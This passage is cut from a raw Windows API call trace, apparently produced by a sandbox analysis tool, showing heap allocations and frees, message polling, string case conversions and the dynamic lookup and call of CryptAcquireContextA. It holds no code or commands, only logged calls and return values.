(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0244.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0244.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.453] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0244.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.453] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0244.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.454] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2720) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.457] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.457] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.457] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0244.457] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0244.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0244.458] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0244.458] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.458] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0244.458] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.458] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.458] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.458] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.458] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0244.458] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.459] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0244.459] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.459] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.459] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0244.459] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0244.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.459] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0244.460] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0244.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.460] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0244.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0244.461] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0244.461] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.462] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0244.462] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.462] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0244.462] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.462] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.462] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.462] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.462] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0244.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0244.463] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.463] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, 